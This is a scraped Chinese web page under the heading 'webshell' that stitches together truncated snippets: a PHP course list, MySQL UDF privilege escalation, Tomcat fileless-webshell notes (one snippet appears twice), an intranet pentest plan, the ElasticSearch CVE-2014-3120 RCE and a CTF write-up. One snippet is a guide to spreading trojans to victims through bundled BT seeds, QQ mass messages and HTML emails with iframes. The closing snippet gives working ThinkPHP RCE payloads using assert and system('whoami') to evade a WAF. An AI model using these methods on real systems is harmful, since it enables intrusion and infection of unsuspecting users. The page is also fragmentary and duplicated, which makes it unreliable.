webshell

本帖最后由 L岚 于 2018-9-2 07:37 编辑 1.php编程 ----1.讲师介绍+http协议+挖掘BUG.mp4 ----2.搭建apache+php+mysql.mp4 ----3.搭建域名.mp4 ----4.PHP变量+变量的引用.mp4 ----5.数据类型+字符串函数+常量+运算符+if判断+switch+while.mp4 ----6.补上昨天运算符与优先级.mp4 ----7.for循环.mp4 ----8.函数.mp4 ----9.return+引用函数.mp4 ----10.数组.mp4 ----11.时间戳+系统变量+文件操作.mp4 ----12.GET跟POST请求.mp4 ----13.三元运算符.mp4 ----14.mysql数据库文件类型+创建数据库+创建表+字段.mp4 ----15.文件包含上.mp4 ----16.文件包含下.mp4 ----17.MYSQL所有操作.mp4 ----18.PHP操作数据库.mp4 ----19.补上数据类型,自增型,搜索关键字,分页.mp4 ----20.面向对象.mp4 ----21.session与cookie的原理.mp4 ----22.定义cookie+cookie跨域.mp4 ----23.文件上传.mp4 ----24.可变变量.mp4 链接：https://pan.baidu

0x01 UDF UDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。 0x02 windows下udf提权的条件 如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/ 如果mysql版本小于5.1， udf.dll文件在windows server 2003下放置于c:\windows\system32目录，在windows server 2000下放置在c:\winnt\system32目录。 掌握mysql数据库的账户，从拥有对mysql的insert和delete权限，以创建和抛弃函数。 拥有可以将udf.dll写入相应目录的权限。 0x03 提权方法 如果是mysql5.1及以上版本，必须要把udf.dll文件放到mysql安装目录的lib\plugin文件夹下才能创建自定义函数。该目录默认是不存在的，需要使用webshell找到mysql的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录。 在sqlmap中可以导入udf 复制到新建目录 create function sys_eval returns

内容索引: 5.1. PHP 5.1.1. 后门 5.1.1.1. php.ini构成的后门 5.1.1.2. .user.ini文件构成的PHP后门 5.1.2. 反序列化 5.1.2.1. PHP序列化实现 5.1.2.2. PHP反序列化漏洞 5.1.2.3. 相关CVE 5.1.2.3.1. CVE-2016-7124 5.1.3. Disable Functions 5.1.3.1. 机制实现 5.1.3.2. Bypass 5.1.4. Open Basedir 5.1.4.1. 机制实现 5.1.5. 安全相关配置 5.1.5.1. 函数与类限制 5.1.5.2. 目录访问限制 5.1.5.3. 远程引用限制 5.1.5.4. Session 5.1.5.4.1. Session.Save 5.1.5.4.2. Session.Upload 5.1.6. PHP流 5.1.6.1. 简介 5.1.6.2. 封装协议 5.1.6.3. PHP支持流 5.1.6.3.1. 输入输出流 5.1.6.3.2. fd 5.1.6.3.3. memory与temp 5.1.6.3.4. input 5.1.6.4. filter 5.1.6.4.1. 过滤器列表 5.1.6.4.2. 过滤器利用tricks 5.1.7. htaccess injection payload 5

前言 最近，看到好多不错的关于“无文件Webshell”的文章，对其中利用上下文动态的注入 Filter 的技术做了一下简单验证，写一下测试总结，不依赖任何框架，仅想学习一下tomcat的filter。 先放几篇大佬的文章： Tomcat中一种半通用回显方法 tomcat结合shiro无文件webshell的技术研究以及检测方法 Tomcat通用回显学习 基于全局储存的新思路 | Tomcat的一种通用回显方法研究 threedr3am/ysoserial Filter介绍 详细介绍略，简单记录一下我的理解： 过滤器（Filter）：用来对指定的URL进行过滤处理，类似 .net core 里的中间件，例如登录验证过滤器可以用来限制资源的未授权访问； 过滤链（FilterChain）：通过URL匹配动态将所有符合URL规则的过滤器共同组成一个过滤链，顺序有先后，类似 .net core 的管道，不过区别在于过滤链是单向的，管道是双向； 同Servlet，一般Filter的配置方式： web.xml @WebFilter修饰 Filter注册调用流程 新建一个登录验证的Filter: SessionFilter.java package com.reinject.MyFilter; import java.io.IOException; import javax.servlet

本文仅为了学习交流，自己搭建靶机环境进行测试，严禁非法使用！！！ (随笔仅为平时的学习记录，若有错误请大佬指出) 一: 内网靶机分布 内网入口(攻击者和该win10在同一网段，攻击者无法访问win10虚拟机中的主机) win10 phpstudy thinkphpv5.0.24 域环境（均可以出网） win7 phpstudy uploads-lab win2003 jboss4.x漏洞 win2008 域控 双网卡(其中一个网卡链接着下面的主机) 其他主机(以下主机在同一网段，不能出网，与域环境处于不同网段，只有域控可以访问以下主机) win7 Tomcat win2008 Mssql win2003 win2012 weblogic 攻击思路: 拿下存下ThinkPhp漏洞的主机-开启socks代理进入内网-通过uploads-lab上传webshell拿下win7-通过weblogic漏洞拿下win2012dc-通过jboss4.x漏洞拿下win2003-通过MS14-068漏洞拿下域控-添加第二个网卡的路由-通过Tomcat漏洞拿下win7-解密win7的数据库密码拿下win2008权限-获取win2008的远程连接凭证拿下win2003-拿下全部主机 二:(Cobalt Strike3.14简称CS，Msfconsole简称MSF) 访问win10的web服务

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了Easy_unserialize解题思路，详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目，包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF，还是学到了很多东西。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢这些大佬和师傅们（尤其出题和解题的老师们）~ 作者作为网络安全的小白，分享一些自学基础教程给大家，主要是关于安全工具和实践操作的在线笔记，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力，点赞、评论、私聊均可，一起加油喔~ 文章目录 一.Misc-版权保护 1.题目描述 2.解题思路 二.Misc-过早了吗 1.题目描述 2.解题思路 三.Misc-佛系青年BingGe 1.题目描述 2.解题思路 四.Misc-shellOfAwd 1.题目描述 2.解题思路 五.Misc-wechat_game 1.题目描述 2.解题思路 六.RE1 1.题目描述 2.解题思路 七.总结 PS

一.目前流行***传播技术. 1.用BT制作***种子 利用BT制作***种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件 然后捆绑上自己的***,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦. 2.利用PP共享自己捆了***的软件或电影. 方法同BT一样,要找诱惑性电影或软件,捆上自己的***,然后共享自己的目录,这样人 家就会通过搜索找到你的软件或电影.这里电影要配合网页***.可以参看RealOnePla ye***制作.在黑白网络可以找到.当你一打开我们的电影时就会打开我们制作过的网页木 马.这样看电影也会中我们的马. 3.利用QQ邮箱传播***. 这里主要点HTML格式----在里面写上以下这段代码: <body > </body> 当人家一打开你发过去的邮件时,就会中我们的***. 4.QQ群发网页***。 首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群 发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关 ，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页***的信 息。相信只要你的信息够诱惑，肉鸡也是成群的。 5.利用163邮箱传播网页***。 同样，这里用HTML格式，然后填上以下代码： </html><iframe src="你的网页***地址" name="zhu"

前言 最近，看到好多不错的关于“无文件Webshell”的文章，对其中利用上下文动态的注入 Filter 的技术做了一下简单验证，写一下测试总结，不依赖任何框架，仅想学习一下tomcat的filter。 先放几篇大佬的文章： Tomcat中一种半通用回显方法 tomcat结合shiro无文件webshell的技术研究以及检测方法 Tomcat通用回显学习 基于全局储存的新思路 | Tomcat的一种通用回显方法研究 threedr3am/ysoserial Filter介绍 详细介绍略，简单记录一下我的理解： 过滤器（Filter）：用来对指定的URL进行过滤处理，类似 .net core 里的中间件，例如登录验证过滤器可以用来限制资源的未授权访问； 过滤链（FilterChain）：通过URL匹配动态将所有符合URL规则的过滤器共同组成一个过滤链，顺序有先后，类似 .net core 的管道，不过区别在于过滤链是单向的，管道是双向； 同Servlet，一般Filter的配置方式： web.xml @WebFilter修饰 Filter注册调用流程 新建一个登录验证的Filter: SessionFilter.java package com.reinject.MyFilter; import java.io.IOException; import javax.servlet

ElasticSearch简介 ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎。设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。支持通过HTTP使用JSON进行数据索引。 CVE-2014-3120原理 ElasticSearch有脚本执行的功能，使用的引擎为MVEL，该引擎没有做任何的防护，或者沙盒包装，所以可以直接执行任意代码。 由于在ElasticSearch的默认配置下，动态脚本执行功能处于打开状态，导致用户可以构造恶意的请求包，执行任意代码。 漏洞测试 ElasticSearch版本：v1.1.1 利用该漏洞之前，es至少需要存在一条数据，通过以下请求包创建数据： POST /mitian/mitian6/ HTTP/1.1Host: 192.168.0.16:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22{ "name": "kjsx"}

环境： Thinkphp 5.0.15 PHP version:7.0.12 WAF: D盾 ，安全狗 Thinkphp 采用 MVC 模式 核心:模块 -> 控制器 –> 方法 思路：利用已经有的think 类包库 去做一些事情 利用已有的功能，顺便对D盾 绕过 方法： Payload1: http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[1]=phpinfo() Payload2: http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[1]=system(‘whoami’) 代码： <? php namespace app\index\controller; use \think\App; class index { public function index( $f , $shell ) { $a = new App(); $c = $a ->invokeFunction( $f , $shell ); return '</br> sucess' ; } } 关于用这个的来源： Thinkphp5 rce 漏洞